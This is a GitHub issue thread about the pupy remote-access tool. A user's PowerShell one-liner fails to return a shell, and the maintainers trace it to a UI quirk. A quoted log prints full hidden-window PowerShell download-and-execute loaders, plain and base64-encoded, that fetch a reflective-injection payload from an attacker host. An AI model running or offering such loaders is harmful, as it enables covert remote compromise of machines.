### ISSUE TITLE
You should have a pupy shell in few seconds from this host...and no shell

### ISSUE THREAD

**Issue by jasc22** [n1nj4sec/pupy#672]
I've been playing with this for a while but can't seem to get a shell back using a PS oneliner. I also disabled Defender and the Firewall. When I run an executable it works and I get a shell back. I also increased my VM's memory since I saw someone else had a similar issues but that did not work either.

Thanks in advance!

**Comment by Strazzom** [comment]
First, please refer to the [contribution guidelines](https://github.com/n1nj4sec/pupy/wiki/Contribution-Guidelines) in the wiki, especially the part about properly formatting code blocks. I would recommend creating a gist for output that long.

Regarding the actual issue: if you are running pupy using docker or docker compose, there is additional configuration required to expose the necessary ports (in this case ports 8080 and 443). 

How are you running pupy? Have you explicitly configured a listener for that port?

**Comment by jasc22** [comment]
Thanks for your response, Strazzom. I tried running it using pupygen.sh and then using the workspace method pupyws/bin/pupysh. Using the first method the victim downloads the payloads however does not establish a session. The second method establishes a session but hangs and I'm not able to execute any commands. Please see the gist below which includes the log and netstat on Kali Rolling. The victim is running Windows 10 Pro.

https://gist.github.com/jasc22/67767f1a672d742471303b1f53fbf6ce

Appreciate your help with this.

**Comment by jasc22** [comment]
After typing Ctrl+C the session was still established and I was able to interact with the system. Not sure what the issue might be but it works now.

**Comment by alxchk** [comment]
It's because of a bit silly UI. `gen` "blocks" until you press ^C. And you should press ^C when you got a session.. Some day we'll rework this..

**Comment by jasc22** [comment]
Thanks for the explanation and look forward to the fix. Appreciate your help with this.

**Comment by zaicce1** [comment]
No not yet

On 2 Oct 2018 06:42, "jasc22" <notifications@github.com> wrote:
>
> I've been playing with this for a while but can't seem to get a shell
back using a PS oneliner. I also disabled Defender and the Firewall. When I
run an executable it works and I get a shell back. I also increased my VM's
memory since I saw someone else had a similar issues but that did not work
either.
>
> Please see output below. Thanks in advance!
>
> root@rolling:/opt/pupy/pupy# ./pupygen.py -f ps1_oneliner -O windows -A
x64 --randomize-hash connect --host 192.168.106.161:443 -t ssl
> No handlers could be found for logger "pupy.network.pss"
> [!] Press Ctrl+C to stop server
> [+] Generating puppy dll to gain server reaction time. Be patient...
>
> { Configuration }
> KEY VALUE
> launcher connect
> launcher_args --host 192.168.106.161:443 -t ssl
> cid 0xbd45a180L
> offline_script PRESENT
>
> [I] Credentials password:
> [+] Required credentials (found)
>
> SSL_BIND_CERT
> SSL_CA_CERT
> SSL_CLIENT_CERT
> SSL_BIND_KEY
> SSL_CLIENT_KEY
> [+] X86 dll loaded and 46 variables used
> { Configuration }
> KEY VALUE
> launcher connect
> launcher_args --host 192.168.106.161:443 -t ssl
> cid 0xbd45a180L
> offline_script PRESENT
>
> [+] Required credentials (found)
>
> SSL_BIND_CERT
> SSL_CA_CERT
> SSL_CLIENT_CERT
> SSL_BIND_KEY
> SSL_CLIENT_KEY
> [+] X64 dll loaded and 51 variables used
> [+] Copy/paste one of these one-line loader to deploy pupy without
writing on the disk:
> powershell.exe -w hidden -noni -nop -c
"[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX(New-Object
Net.WebClient).DownloadString('https://192.168.106.161:8080/IgeUdgceYB.txt')
;"
> powershell.exe -w hidden -noni -nop -enc
WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsASQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMAA2AC4AMQA2ADEAOgA4ADAAOAAwAC8ASQBnAGUAVQBkAGcAYwBlAFkAQgAuAHQAeAB0ACcAKQA7AA==
> [!] Please note that even if the target's system uses a proxy, this
previous powershell command will not use the proxy for downloading pupy
> [+] Started http server on 0.0.0.0:8080
> [+] Waiting for a connection ...
> 192.168.106.143 - - [01/Oct/2018 13:37:58] "GET /IgeUdgceYB.txt HTTP/1.1"
200 -
> [+] [Stage 1/2] Powershell script served !
> 192.168.106.143 - - [01/Oct/2018 13:37:58] "GET /KpaLwqbvhB.txt HTTP/1.1"
200 -
> [+] Remote script is running in a x64 powershell process
> [+] [Stage 2/2] Powershell Invoke-ReflectivePEInjection script (with dll
embedded) served!
> [+] 192.168.106.143:You should have a pupy shell in few seconds from this
host...
